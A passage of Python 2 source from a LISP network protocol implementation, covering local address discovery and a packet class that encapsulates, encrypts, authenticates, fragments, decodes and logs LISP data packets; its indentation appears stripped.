if (rlocs[0] == None): continue
rlocs[2] = device
break
#endfor
addr1 = rlocs[0].print_address_no_iid() if rlocs[0] else "none"
addr2 = rlocs[1].print_address_no_iid() if rlocs[1] else "none"
device = rlocs[2] if rlocs[2] else "none"
device_select = " (user selected)" if device_select != None else ""
addr1 = red(addr1, False)
addr2 = red(addr2, False)
device = bold(device, False)
lprint("Local addresses are IPv4: {}, IPv6: {} from device {}{}, iid {}". \
format(addr1, addr2, device, device_select, device_iid))
lisp_myrlocs = rlocs
return((rlocs[0] != None))
#enddef
#
# lisp_get_all_addresses
#
# Return a list of all local IPv4 and IPv6 addresses from kernel. This is
# going to be used for building pcap and iptables filters. So no loopback or
# link-local addresses are returned.
#
def lisp_get_all_addresses():
address_list = []
for interface in netifaces.interfaces():
try: entry = netifaces.ifaddresses(interface)
except: continue
if (entry.has_key(netifaces.AF_INET)):
for addr in entry[netifaces.AF_INET]:
a = addr["addr"]
if (a.find("127.0.0.1") != -1): continue
address_list.append(a)
#endfor
#endif
if (entry.has_key(netifaces.AF_INET6)):
for addr in entry[netifaces.AF_INET6]:
a = addr["addr"]
if (a == "::1"): continue
if (a[0:5] == "fe80:"): continue
address_list.append(a)
#endfor
#endif
#endfor
return(address_list)
#enddef
#
# lisp_get_all_multicast_rles
#
# Grep lisp.config and get all multicast RLEs that appear in the configuration.
# Returns either an empty array or filled with one or more multicast addresses.
#
def lisp_get_all_multicast_rles():
rles = []
out = commands.getoutput('egrep "rle-address =" ./lisp.config')
if (out == ""): return(rles)
lines = out.split("\n")
for line in lines:
if (line[0] == "#"): continue
rle = line.split("rle-address = ")[1]
rle_byte = int(rle.split(".")[0])
if (rle_byte >= 224 and rle_byte < 240): rles.append(rle)
#endfor
return(rles)
#enddef
#------------------------------------------------------------------------------
#
# LISP packet contents. This keeps state for a LISP encapsulated packet that
# is processed by an RTR and ETR.
#
class lisp_packet():
def __init__(self, packet):
self.outer_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.outer_dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.outer_tos = 0
self.outer_ttl = 0
self.udp_sport = 0
self.udp_dport = 0
self.udp_length = 0
self.udp_checksum = 0
self.inner_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.inner_dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.inner_tos = 0
self.inner_ttl = 0
self.inner_protocol = 0
self.inner_sport = 0
self.inner_dport = 0
self.lisp_header = lisp_data_header()
self.packet = packet
self.inner_version = 0
self.outer_version = 0
self.encap_port = LISP_DATA_PORT
self.inner_is_fragment = False
self.packet_error = ""
self.gleaned_dest = False
#enddef
def encode(self, nonce):
#
# We could be running with no RLOCs found. If lisp_myrlocs[] is None,
# then self.outer_source will be LISP_AFI_NONE.
#
if (self.outer_source.is_null()): return(None)
#
# We have to build the LISP header here because if we are doing
# lisp-crypto, the ICV covers the LISP header. The function
# lisp_packet.encrypt() will put in the key-id.
#
if (nonce == None):
self.lisp_header.nonce(lisp_get_data_nonce())
elif (self.lisp_header.is_request_nonce(nonce)):
self.lisp_header.request_nonce(nonce)
else:
self.lisp_header.nonce(nonce)
#endif
self.lisp_header.instance_id(self.inner_dest.instance_id)
#
# Encrypt the packet. If something went wrong, send unencrypted packet
# by telling RLOC with key-id 0. For now, just use key-id 1. We are
# supporting just a single key.
#
self.lisp_header.key_id(0)
control = (self.lisp_header.get_instance_id() == 0xffffff)
if (lisp_data_plane_security and control == False):
addr_str = self.outer_dest.print_address_no_iid() + ":" + \
str(self.encap_port)
if (lisp_crypto_keys_by_rloc_encap.has_key(addr_str)):
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]):
keys[1].use_count += 1
packet, encrypted = self.encrypt(keys[1], addr_str)
if (encrypted): self.packet = packet
#endif
#endif
#endif
#
# Start with UDP header. Call hash_packet() to set source-port value.
# Unless we are doing lisp-crypto and nat-traversal.
#
self.udp_checksum = 0
if (self.encap_port == LISP_DATA_PORT):
if (lisp_crypto_ephem_port == None):
if (self.gleaned_dest):
self.udp_sport = LISP_DATA_PORT
else:
self.hash_packet()
#endif
else:
self.udp_sport = lisp_crypto_ephem_port
#endif
else:
self.udp_sport = LISP_DATA_PORT
#endif
self.udp_dport = self.encap_port
self.udp_length = len(self.packet) + 16
#
# IPv6 raw sockets need to have the UDP ports not swapped.
#
if (self.outer_version == 4):
sport = socket.htons(self.udp_sport)
dport = socket.htons(self.udp_dport)
else:
sport = self.udp_sport
dport = self.udp_dport
#endif
dport = socket.htons(self.udp_dport) if self.outer_version == 4 else \
self.udp_dport
udp = struct.pack("HHHH", sport, dport, socket.htons(self.udp_length),
self.udp_checksum)
#
# Encode the LISP header.
#
lisp = self.lisp_header.encode()
#
# Now prepend all 3 headers, LISP, UDP, outer header. See lisp_packet.
# fix_outer_header() for byte-swap details for the frag-offset field.
#
if (self.outer_version == 4):
tl = socket.htons(self.udp_length + 20)
frag = socket.htons(0x4000)
outer = struct.pack("BBHHHBBH", 0x45, self.outer_tos, tl, 0xdfdf,
frag, self.outer_ttl, 17, 0)
outer += self.outer_source.pack_address()
outer += self.outer_dest.pack_address()
outer = lisp_ip_checksum(outer)
elif (self.outer_version == 6):
outer = ""
# short = 6 << 12
# short |= self.outer_tos << 4
# short = socket.htons(short)
# tl = socket.htons(self.udp_length)
# outer = struct.pack("HHHBB", short, 0, tl, 17, self.outer_ttl)
# outer += self.outer_source.pack_address()
# outer += self.outer_dest.pack_address()
else:
return(None)
#endif
self.packet = outer + udp + lisp + self.packet
return(self)
#enddef
def cipher_pad(self, packet):
length = len(packet)
if ((length % 16) != 0):
pad = ((length/16) + 1) * 16
packet = packet.ljust(pad)
#endif
return(packet)
#enddef
def encrypt(self, key, addr_str):
if (key == None or key.shared_key == None):
return([self.packet, False])
#endif
#
# Pad packet to multiple of 16 bytes and call AES cipher.
#
packet = self.cipher_pad(self.packet)
iv = key.get_iv()
ts = lisp_get_timestamp()
aead = None
if (key.cipher_suite == LISP_CS_25519_CHACHA):
encrypt = chacha.ChaCha(key.encrypt_key, iv).encrypt
elif (key.cipher_suite == LISP_CS_25519_GCM):
k = binascii.unhexlify(key.encrypt_key)
try:
aesgcm = AES.new(k, AES.MODE_GCM, iv)
encrypt = aesgcm.encrypt
aead = aesgcm.digest
except:
lprint("You need AES-GCM, do a 'pip install pycryptodome'")
return([self.packet, False])
#endtry
else:
k = binascii.unhexlify(key.encrypt_key)
encrypt = AES.new(k, AES.MODE_CBC, iv).encrypt
#endif
ciphertext = encrypt(packet)
if (ciphertext == None): return([self.packet, False])
ts = int(str(time.time() - ts).split(".")[1][0:6])
#
# GCM requires 16 bytes of an AEAD MAC tag at the end of the
# ciphertext. Needed to interoperate with the Go implemenation of
# AES-GCM. The MAC digest was computed above.
#
if (aead != None): ciphertext += aead()
#
# Compute ICV and append to packet. ICV covers the LISP header, the
# IV, and the cipertext.
#
self.lisp_header.key_id(key.key_id)
lisp = self.lisp_header.encode()
icv = key.do_icv(lisp + iv + ciphertext, iv)
ps = 4 if (key.do_poly) else 8
string = bold("Encrypt", False)
cipher_str = bold(key.cipher_suite_string, False)
addr_str = "RLOC: " + red(addr_str, False)
auth = "poly" if key.do_poly else "sha256"
auth = bold(auth, False)
icv_str = "ICV({}): 0x{}...{}".format(auth, icv[0:ps], icv[-ps::])
dprint("{} for key-id: {}, {}, {}, {}-time: {} usec".format( \
string, key.key_id, addr_str, icv_str, cipher_str, ts))
icv = int(icv, 16)
if (key.do_poly):
icv1 = byte_swap_64((icv >> 64) & LISP_8_64_MASK)
icv2 = byte_swap_64(icv & LISP_8_64_MASK)
icv = struct.pack("QQ", icv1, icv2)
else:
icv1 = byte_swap_64((icv >> 96) & LISP_8_64_MASK)
icv2 = byte_swap_64((icv >> 32) & LISP_8_64_MASK)
icv3 = socket.htonl(icv & 0xffffffff)
icv = struct.pack("QQI", icv1, icv2, icv3)
#endif
return([iv + ciphertext + icv, True])
#enddef
def decrypt(self, packet, header_length, key, addr_str):
#
# Do ICV first. If it succeeds, then decrypt. Get ICV from packet and
# truncate packet to run hash over. Compare packet hash with computed
# hash.
#
if (key.do_poly):
icv1, icv2 = struct.unpack("QQ", packet[-16::])
packet_icv = byte_swap_64(icv1) << 64
packet_icv |= byte_swap_64(icv2)
packet_icv = lisp_hex_string(packet_icv).zfill(32)
packet = packet[0:-16]
ps = 4
hash_str = bold("poly", False)
else:
icv1, icv2, icv3 = struct.unpack("QQI", packet[-20::])
packet_icv = byte_swap_64(icv1) << 96
packet_icv |= byte_swap_64(icv2) << 32
packet_icv |= socket.htonl(icv3)
packet_icv = lisp_hex_string(packet_icv).zfill(40)
packet = packet[0:-20]
ps = 8
hash_str = bold("sha", False)
#endif
lisp = self.lisp_header.encode()
#
# Get the IV and use it to decrypt and authenticate..
#
if (key.cipher_suite == LISP_CS_25519_CHACHA):
iv_len = 8
cipher_str = bold("chacha", False)
elif (key.cipher_suite == LISP_CS_25519_GCM):
iv_len = 12
cipher_str = bold("aes-gcm", False)
else:
iv_len = 16
cipher_str = bold("aes-cbc", False)
#endif
iv = packet[0:iv_len]
#
# Compute ICV over LISP header and packet payload.
#
computed_icv = key.do_icv(lisp + packet, iv)
p_icv = "0x{}...{}".format(packet_icv[0:ps], packet_icv[-ps::])
c_icv = "0x{}...{}".format(computed_icv[0:ps], computed_icv[-ps::])
if (computed_icv != packet_icv):
self.packet_error = "ICV-error"
funcs = cipher_str + "/" + hash_str
fail = bold("ICV failed ({})".format(funcs), False)
icv_str = "packet-ICV {} != computed-ICV {}".format(p_icv, c_icv)
dprint(("{} from RLOC {}, receive-port: {}, key-id: {}, " + \
"packet dropped, {}").format(fail, red(addr_str, False),
self.udp_sport, key.key_id, icv_str))
dprint("{}".format(key.print_keys()))
#
# This is the 4-tuple NAT case. There another addr:port that
# should have the crypto-key the encapsulator is using. This is
# typically done on the RTR.
#
lisp_retry_decap_keys(addr_str, lisp + packet, iv, packet_icv)
return([None, False])
#endif
#
# Advance over IV for decryption.
#
packet = packet[iv_len::]
#
# Call AES or chacha cipher. Make sure for AES that
#
ts = lisp_get_timestamp()
if (key.cipher_suite == LISP_CS_25519_CHACHA):
decrypt = chacha.ChaCha(key.encrypt_key, iv).decrypt
elif (key.cipher_suite == LISP_CS_25519_GCM):
k = binascii.unhexlify(key.encrypt_key)
try:
decrypt = AES.new(k, AES.MODE_GCM, iv).decrypt
except:
self.packet_error = "no-decrypt-key"
lprint("You need AES-GCM, do a 'pip install pycryptodome'")
return([None, False])
#endtry
else:
if ((len(packet) % 16) != 0):
dprint("Ciphertext not multiple of 16 bytes, packet dropped")
return([None, False])
#endif
k = binascii.unhexlify(key.encrypt_key)
decrypt = AES.new(k, AES.MODE_CBC, iv).decrypt
#endif
plaintext = decrypt(packet)
ts = int(str(time.time() - ts).split(".")[1][0:6])
#
# Now decrypt packet and return plaintext payload.
#
string = bold("Decrypt", False)
addr_str = "RLOC: " + red(addr_str, False)
auth = "poly" if key.do_poly else "sha256"
auth = bold(auth, False)
icv_str = "ICV({}): {}".format(auth, p_icv)
dprint("{} for key-id: {}, {}, {} (good), {}-time: {} usec". \
format(string, key.key_id, addr_str, icv_str, cipher_str, ts))
#
# Keep self.packet the outer header, UDP header, and LISP header.
# We will append the plaintext in the caller once we parse the inner
# packet length so we can truncate any padding the encryptor put on.
#
self.packet = self.packet[0:header_length]
return([plaintext, True])
#enddef
def fragment_outer(self, outer_hdr, inner_packet):
frag_len = 1000
#
# Break up packet payload in fragments and put in array to have
# IP header added in next loop below.
#
frags = []
offset = 0
length = len(inner_packet)
while (offset < length):
frag = inner_packet[offset::]
if (len(frag) > frag_len): frag = frag[0:frag_len]
frags.append(frag)
offset += len(frag)
#endwhile
#
# Now fix outer IPv4 header with fragment-offset values and add the
# IPv4 value.
#
fragments = []
offset = 0
for frag in frags:
#
# Set frag-offset field in outer IPv4 header.
#
fo = offset if (frag == frags[-1]) else 0x2000 + offset
fo = socket.htons(fo)
outer_hdr = outer_hdr[0:6] + struct.pack("H", fo) + outer_hdr[8::]
#
# Set total-length field in outer IPv4 header and checksum.
#
l = socket.htons(len(frag) + 20)
outer_hdr = outer_hdr[0:2] + struct.pack("H", l) + outer_hdr[4::]
outer_hdr = lisp_ip_checksum(outer_hdr)
fragments.append(outer_hdr + frag)
offset += len(frag) / 8
#endfor
return(fragments)
#enddef
def fragment(self):
packet = self.fix_outer_header(self.packet)
#
# If inner header is IPv4, we will fragment the inner header and encap
# each fragment. If the inner header is IPv6, we will not add the
# Fragmentation Header into the inner IPv6 packet.
#
length = len(packet)
if (length <= 1500): return([packet], "Fragment-None")
packet = self.packet
#
# Fragment outer IPv4 header if inner packet is IPv6 (or Mac frame).
# We cannot fragment IPv6 packet since we are not the source.
#
if (self.inner_version != 4):
ident = random.randint(0, 0xffff)
outer_hdr = packet[0:4] + struct.pack("H", ident) + packet[6:20]
inner_packet = packet[20::]
fragments = self.fragment_outer(outer_hdr, inner_packet)
return(fragments, "Fragment-Outer")
#endif
#
# Fragment inner IPv4 packet.
#
outer_hdr_len = 56 if (self.outer_version == 6) else 36
outer_hdr = packet[0:outer_hdr_len]
inner_hdr = packet[outer_hdr_len: outer_hdr_len + 20]
inner_packet = packet[outer_hdr_len + 20::]
#
# If DF-bit is set, don't fragment packet.
#
frag_field = struct.unpack("H", inner_hdr[6:8])[0]
frag_field = socket.ntohs(frag_field)
ignore_df = os.getenv("LISP_IGNORE_DF_BIT") != None
if (frag_field & 0x4000):
if (ignore_df):
frag_field &= ~0x4000
else:
df_bit = bold("DF-bit set", False)
dprint("{} in inner header, packet discarded".format(df_bit))
return([], "Fragment-None-DF-bit")
#endif
#endif
offset = 0
length = len(inner_packet)
fragments = []
while (offset < length):
fragments.append(inner_packet[offset:offset+1400])
offset += 1400
#endwhile
#
# Now put inner header and outer header on each fragment.
#
frags = fragments
fragments = []
mf = True if frag_field & 0x2000 else False
frag_field = (frag_field & 0x1fff) * 8
for frag in frags:
#
# Set fragment-offset and MF bit if not last fragment.
#
ff = frag_field / 8
if (mf):
ff |= 0x2000
elif (frag != frags[-1]):
ff |= 0x2000
#endif
ff = socket.htons(ff)
inner_hdr = inner_hdr[0:6] + struct.pack("H", ff) + inner_hdr[8::]
#
# Set length of fragment, set up offset for next fragment-offset,
# and header checksum fragment packet. Then prepend inner header
# to payload.
#
length = len(frag)
frag_field += length
l = socket.htons(length + 20)
inner_hdr = inner_hdr[0:2] + struct.pack("H", l) + \
inner_hdr[4:10] + struct.pack("H", 0) + inner_hdr[12::]
inner_hdr = lisp_ip_checksum(inner_hdr)
fragment = inner_hdr + frag
#
# Change outer header length and header checksum if IPv4 outer
# header. If IPv6 outer header, raw sockets prepends the header.
#
length = len(fragment)
if (self.outer_version == 4):
l = length + outer_hdr_len
length += 16
outer_hdr = outer_hdr[0:2] + struct.pack("H", l) + \
outer_hdr[4::]
outer_hdr = lisp_ip_checksum(outer_hdr)
fragment = outer_hdr + fragment
fragment = self.fix_outer_header(fragment)
#endif
#
# Finally fix outer UDP header length. Byte-swap it.
#
udp_len_index = outer_hdr_len - 12
l = socket.htons(length)
fragment = fragment[0:udp_len_index] + struct.pack("H", l) + \
fragment[udp_len_index+2::]
fragments.append(fragment)
#endfor
return(fragments, "Fragment-Inner")
#enddef
def fix_outer_header(self, packet):
#
# IP_HDRINCL requires the total-length and frag-offset fields to be
# in host byte order. So have to byte-swapped here. But when testing
# we (UPC guys) discovered the frag field didn't need swapping. The
# conclusion is that byte-swapping is necessary for MacOS but not for
# Linux OSes.
#
if (self.outer_version == 4 or self.inner_version == 4):
if (lisp_is_macos()):
packet = packet[0:2] + packet[3] + packet[2] + packet[4:6] + \
packet[7] + packet[6] + packet[8::]
else:
packet = packet[0:2] + packet[3] + packet[2] + packet[4::]
#endif
#endif
return(packet)
#enddef
def send_packet(self, lisp_raw_socket, dest):
if (lisp_flow_logging and dest != self.inner_dest): self.log_flow(True)
dest = dest.print_address_no_iid()
fragments, in_or_out = self.fragment()
for fragment in fragments:
if (len(fragments) != 1):
self.packet = fragment
self.print_packet(in_or_out, True)
#endif
try: lisp_raw_socket.sendto(fragment, (dest, 0))
except socket.error, e:
lprint("socket.sendto() failed: {}".format(e))
#endtry
#endfor
#enddef
def send_l2_packet(self, l2_socket, mac_header):
if (l2_socket == None):
lprint("No layer-2 socket, drop IPv6 packet")
return
#endif
if (mac_header == None):
lprint("Could not build MAC header, drop IPv6 packet")
return
#endif
packet = mac_header + self.packet
# try: l2_socket.send(packet)
# except socket.error, e:
# lprint("send_l2_packet(): socket.send() failed: {}".format(e))
# #endtry
# return
#
# Use tuntap tunnel interface instead of raw sockets for IPv6
# decapsulated packets.
#
l2_socket.write(packet)
return
#enddef
def bridge_l2_packet(self, eid, db):
try: dyn_eid = db.dynamic_eids[eid.print_address_no_iid()]
except: return
try: interface = lisp_myinterfaces[dyn_eid.interface]
except: return
try:
socket = interface.get_bridge_socket()
if (socket == None): return
except: return
try: socket.send(self.packet)
except socket.error, e:
lprint("bridge_l2_packet(): socket.send() failed: {}".format(e))
#endtry
#enddef
def is_lisp_packet(self, packet):
udp = (struct.unpack("B", packet[9])[0] == LISP_UDP_PROTOCOL)
if (udp == False): return(False)
port = struct.unpack("H", packet[22:24])[0]
if (socket.ntohs(port) == LISP_DATA_PORT): return(True)
port = struct.unpack("H", packet[20:22])[0]
if (socket.ntohs(port) == LISP_DATA_PORT): return(True)
return(False)
#enddef
def decode(self, is_lisp_packet, lisp_ipc_socket, stats):
self.packet_error = ""
packet = self.packet
orig_len = len(packet)
L3 = L2 = True
#
# Get version number of outer header so we can decode outer addresses.
#
header_len = 0
iid = 0
if (is_lisp_packet):
iid = self.lisp_header.get_instance_id()
version = struct.unpack("B", packet[0:1])[0]
self.outer_version = version >> 4
if (self.outer_version == 4):
#
# MacOS is zeroing the IP header checksum for a raw socket.
# If we receive this, bypass the checksum calculation.
#
orig_checksum = struct.unpack("H", packet[10:12])[0]
packet = lisp_ip_checksum(packet)
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum != 0):
if (orig_checksum != 0 or lisp_is_macos() == False):
self.packet_error = "checksum-error"
if (stats):
stats[self.packet_error].increment(orig_len)
#endif
lprint("IPv4 header checksum failed for outer header")
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#endif
afi = LISP_AFI_IPV4
offset = 12
self.outer_tos = struct.unpack("B", packet[1:2])[0]
self.outer_ttl = struct.unpack("B", packet[8:9])[0]
header_len = 20
elif (self.outer_version == 6):
afi = LISP_AFI_IPV6
offset = 8
tos = struct.unpack("H", packet[0:2])[0]
self.outer_tos = (socket.ntohs(tos) >> 4) & 0xff
self.outer_ttl = struct.unpack("B", packet[7:8])[0]
header_len = 40
else:
self.packet_error = "outer-header-error"
if (stats): stats[self.packet_error].increment(orig_len)
lprint("Cannot decode outer header")
return(None)
#endif
self.outer_source.afi = afi
self.outer_dest.afi = afi
addr_length = self.outer_source.addr_length()
self.outer_source.unpack_address(packet[offset:offset+addr_length])
offset += addr_length
self.outer_dest.unpack_address(packet[offset:offset+addr_length])
packet = packet[header_len::]
self.outer_source.mask_len = self.outer_source.host_mask_len()
self.outer_dest.mask_len = self.outer_dest.host_mask_len()
#
# Get UDP fields
#
short = struct.unpack("H", packet[0:2])[0]
self.udp_sport = socket.ntohs(short)
short = struct.unpack("H", packet[2:4])[0]
self.udp_dport = socket.ntohs(short)
short = struct.unpack("H", packet[4:6])[0]
self.udp_length = socket.ntohs(short)
short = struct.unpack("H", packet[6:8])[0]
self.udp_checksum = socket.ntohs(short)
packet = packet[8::]
#
# Determine what is inside, a packet or a frame.
#
L3 = (self.udp_dport == LISP_DATA_PORT or
self.udp_sport == LISP_DATA_PORT)
L2 = (self.udp_dport in (LISP_L2_DATA_PORT, LISP_VXLAN_DATA_PORT))
#
# Get LISP header fields.
#
if (self.lisp_header.decode(packet) == False):
self.packet_error = "lisp-header-error"
if (stats): stats[self.packet_error].increment(orig_len)
if (lisp_flow_logging): self.log_flow(False)
lprint("Cannot decode LISP header")
return(None)
#endif
packet = packet[8::]
iid = self.lisp_header.get_instance_id()
header_len += 16
#endif
if (iid == 0xffffff): iid = 0
#
# Time to decrypt if K-bits set.
#
decrypted = False
key_id = self.lisp_header.k_bits
if (key_id):
addr_str = lisp_get_crypto_decap_lookup_key(self.outer_source,
self.udp_sport)
if (addr_str == None):
self.packet_error = "no-decrypt-key"
if (stats): stats[self.packet_error].increment(orig_len)
self.print_packet("Receive", is_lisp_packet)
ks = bold("No key available", False)
dprint("{} for key-id {} to decrypt packet".format(ks, key_id))
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
key = lisp_crypto_keys_by_rloc_decap[addr_str][key_id]
if (key == None):
self.packet_error = "no-decrypt-key"
if (stats): stats[self.packet_error].increment(orig_len)
self.print_packet("Receive", is_lisp_packet)
ks = bold("No key available", False)
dprint("{} to decrypt packet from RLOC {}".format(ks,
red(addr_str, False)))
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#
# Decrypt and continue processing inner header.
#
key.use_count += 1
packet, decrypted = self.decrypt(packet, header_len, key,
addr_str)
if (decrypted == False):
if (stats): stats[self.packet_error].increment(orig_len)
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#endif
#
# Get inner header fields.
#
version = struct.unpack("B", packet[0:1])[0]
self.inner_version = version >> 4
if (L3 and self.inner_version == 4 and version >= 0x45):
packet_len = socket.ntohs(struct.unpack("H", packet[2:4])[0])
self.inner_tos = struct.unpack("B", packet[1:2])[0]
self.inner_ttl = struct.unpack("B", packet[8:9])[0]
self.inner_protocol = struct.unpack("B", packet[9:10])[0]
self.inner_source.afi = LISP_AFI_IPV4
self.inner_dest.afi = LISP_AFI_IPV4
self.inner_source.unpack_address(packet[12:16])
self.inner_dest.unpack_address(packet[16:20])
frag_field = socket.ntohs(struct.unpack("H", packet[6:8])[0])
self.inner_is_fragment = (frag_field & 0x2000 or frag_field != 0)
if (self.inner_protocol == LISP_UDP_PROTOCOL):
self.inner_sport = struct.unpack("H", packet[20:22])[0]
self.inner_sport = socket.ntohs(self.inner_sport)
self.inner_dport = struct.unpack("H", packet[22:24])[0]
self.inner_dport = socket.ntohs(self.inner_dport)
#endif
elif (L3 and self.inner_version == 6 and version >= 0x60):
packet_len = socket.ntohs(struct.unpack("H", packet[4:6])[0]) + 40
tos = struct.unpack("H", packet[0:2])[0]
self.inner_tos = (socket.ntohs(tos) >> 4) & 0xff
self.inner_ttl = struct.unpack("B", packet[7:8])[0]
self.inner_protocol = struct.unpack("B", packet[6:7])[0]
self.inner_source.afi = LISP_AFI_IPV6
self.inner_dest.afi = LISP_AFI_IPV6
self.inner_source.unpack_address(packet[8:24])
self.inner_dest.unpack_address(packet[24:40])
if (self.inner_protocol == LISP_UDP_PROTOCOL):
self.inner_sport = struct.unpack("H", packet[40:42])[0]
self.inner_sport = socket.ntohs(self.inner_sport)
self.inner_dport = struct.unpack("H", packet[42:44])[0]
self.inner_dport = socket.ntohs(self.inner_dport)
#endif
elif (L2):
packet_len = len(packet)
self.inner_tos = 0
self.inner_ttl = 0
self.inner_protocol = 0
self.inner_source.afi = LISP_AFI_MAC
self.inner_dest.afi = LISP_AFI_MAC
self.inner_dest.unpack_address(self.swap_mac(packet[0:6]))
self.inner_source.unpack_address(self.swap_mac(packet[6:12]))
elif (self.lisp_header.get_instance_id() == 0xffffff):
if (lisp_flow_logging): self.log_flow(False)
return(self)
else:
self.packet_error = "bad-inner-version"
if (stats): stats[self.packet_error].increment(orig_len)
lprint("Cannot decode encapsulation, header version {}".format(\
hex(version)))
packet = lisp_format_packet(packet[0:20])
lprint("Packet header: {}".format(packet))
if (lisp_flow_logging and is_lisp_packet): self.log_flow(False)
return(None)
#endif
self.inner_source.mask_len = self.inner_source.host_mask_len()
self.inner_dest.mask_len = self.inner_dest.host_mask_len()
self.inner_source.instance_id = iid
self.inner_dest.instance_id = iid
#
# If we are configured to do Nonce-Echoing, do lookup on source-EID
# to obtain source RLOC to store nonce to echo.
#
if (lisp_nonce_echoing and is_lisp_packet):
echo_nonce = lisp_get_echo_nonce(self.outer_source, None)
if (echo_nonce == None):
rloc_str = self.outer_source.print_address_no_iid()
echo_nonce = lisp_echo_nonce(rloc_str)
#endif
nonce = self.lisp_header.get_nonce()
if (self.lisp_header.is_e_bit_set()):
echo_nonce.receive_request(lisp_ipc_socket, nonce)
elif (echo_nonce.request_nonce_sent):
echo_nonce.receive_echo(lisp_ipc_socket, nonce)
#endif
#endif
#
# If we decrypted, we may have to truncate packet if the encrypter
# padded the packet.
#
if (decrypted): self.packet += packet[:packet_len]
#
# Log a packet that was parsed correctly.
#
if (lisp_flow_logging and is_lisp_packet): self.log_flow(False)
return(self)
#enddef
def swap_mac(self, mac):
return(mac[1] + mac[0] + mac[3] + mac[2] + mac[5] + mac[4])
#enddef
def strip_outer_headers(self):
offset = 16
offset += 20 if (self.outer_version == 4) else 40
self.packet = self.packet[offset::]
return(self)
#enddef
def hash_ports(self):
packet = self.packet
version = self.inner_version
hashval = 0
if (version == 4):
protocol = struct.unpack("B", packet[9])[0]
if (self.inner_is_fragment): return(protocol)
if (protocol in [6, 17]):
hashval = protocol
hashval += struct.unpack("I", packet[20:24])[0]
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
#endif
if (version == 6):
protocol = struct.unpack("B", packet[6])[0]
if (protocol in [6, 17]):
hashval = protocol
hashval += struct.unpack("I", packet[40:44])[0]
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
#endif
return(hashval)
#enddef
def hash_packet(self):
hashval = self.inner_source.address ^ self.inner_dest.address
hashval += self.hash_ports()
if (self.inner_version == 4):
hashval = (hashval >> 16) ^ (hashval & 0xffff)
elif (self.inner_version == 6):
hashval = (hashval >> 64) ^ (hashval & 0xffffffffffffffff)
hashval = (hashval >> 32) ^ (hashval & 0xffffffff)
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
self.udp_sport = 0xf000 | (hashval & 0xfff)
#enddef
def print_packet(self, s_or_r, is_lisp_packet):
if (is_lisp_packet == False):
iaddr_str = "{} -> {}".format(self.inner_source.print_address(),
self.inner_dest.print_address())
dprint(("{} {}, tos/ttl: {}/{}, length: {}, packet: {} ..."). \
format(bold(s_or_r, False),
green(iaddr_str, False), self.inner_tos,
self.inner_ttl, len(self.packet),
lisp_format_packet(self.packet[0:60])))
return
#endif
if (s_or_r.find("Receive") != -1):
ed = "decap"
ed += "-vxlan" if self.udp_dport == LISP_VXLAN_DATA_PORT else ""
else:
ed = s_or_r
if (ed in ["Send", "Replicate"] or ed.find("Fragment") != -1):
ed = "encap"
#endif
#endif
oaddr_str = "{} -> {}".format(self.outer_source.print_address_no_iid(),
self.outer_dest.print_address_no_iid())
#
# Special case where Info-Request is inside of a 4341 packet for
# NAT-traversal.
#
if (self.lisp_header.get_instance_id() == 0xffffff):
line = ("{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + \
"{}/{}, outer UDP: {} -> {}, ")
line += bold("control-packet", False) + ": {} ..."
dprint(line.format(bold(s_or_r, False), red(oaddr_str, False),
self.outer_tos, self.outer_ttl, self.udp_sport,
self.udp_dport, lisp_format_packet(self.packet[0:56])))
return
else:
line = ("{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + \
"{}/{}, outer UDP: {} -> {}, inner EIDs: {}, " + \
"inner tos/ttl: {}/{}, length: {}, {}, packet: {} ...")
#endif
if (self.lisp_header.k_bits):
if (ed == "encap"): ed = "encrypt/encap"
if (ed == "decap"): ed = "decap/decrypt"
#endif
iaddr_str = "{} -> {}".format(self.inner_source.print_address(),
self.inner_dest.print_address())
dprint(line.format(bold(s_or_r, False), red(oaddr_str, False),
self.outer_tos, self.outer_ttl, self.udp_sport, self.udp_dport,
green(iaddr_str, False), self.inner_tos, self.inner_ttl,
len(self.packet), self.lisp_header.print_header(ed),
lisp_format_packet(self.packet[0:56])))
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.inner_source, self.inner_dest))
#enddef
def get_raw_socket(self):
iid = str(self.lisp_header.get_instance_id())
if (iid == "0"): return(None)
if (lisp_iid_to_interface.has_key(iid) == False): return(None)
interface = lisp_iid_to_interface[iid]
s = interface.get_socket()
if (s == None):
string = bold("SO_BINDTODEVICE", False)
enforce = (os.getenv("LISP_ENFORCE_BINDTODEVICE") != None)
lprint("{} required for multi-tenancy support, {} packet".format( \
string, "drop" if enforce else "forward"))
if (enforce): return(None)
#endif
iid = bold(iid, False)
d = bold(interface.device, False)
dprint("Send packet on instance-id {} interface {}".format(iid, d))
return(s)
#enddef
def log_flow(self, encap):
global lisp_flow_log
dump = os.path.exists("./log-flows")
if (len(lisp_flow_log) == LISP_FLOW_LOG_SIZE or dump):
args = [lisp_flow_log]
lisp_flow_log = []
threading.Thread(target=lisp_write_flow_log, args=args).start()
if (dump): os.system("rm ./log-flows")
return
#endif
ts = datetime.datetime.now()
lisp_flow_log.append([ts, encap, self.packet, self])
#endif
def print_flow(self, ts, encap, packet):
ts = ts.strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
flow = "{}: {}".format(ts, "encap" if encap else "decap")
osrc = red(self.outer_source.print_address_no_iid(), False)
odst = red(self.outer_dest.print_address_no_iid(), False)
isrc = green(self.inner_source.print_address(), False)
idst = green(self.inner_dest.print_address(), False)
if (self.lisp_header.get_instance_id() == 0xffffff):
flow += " {}:{} -> {}:{}, LISP control message type {}\n"
flow = flow.format(osrc, self.udp_sport, odst, self.udp_dport,
self.inner_version)
return(flow)
#endif
if (self.outer_dest.is_null() == False):
flow += " {}:{} -> {}:{}, len/tos/ttl {}/{}/{}"
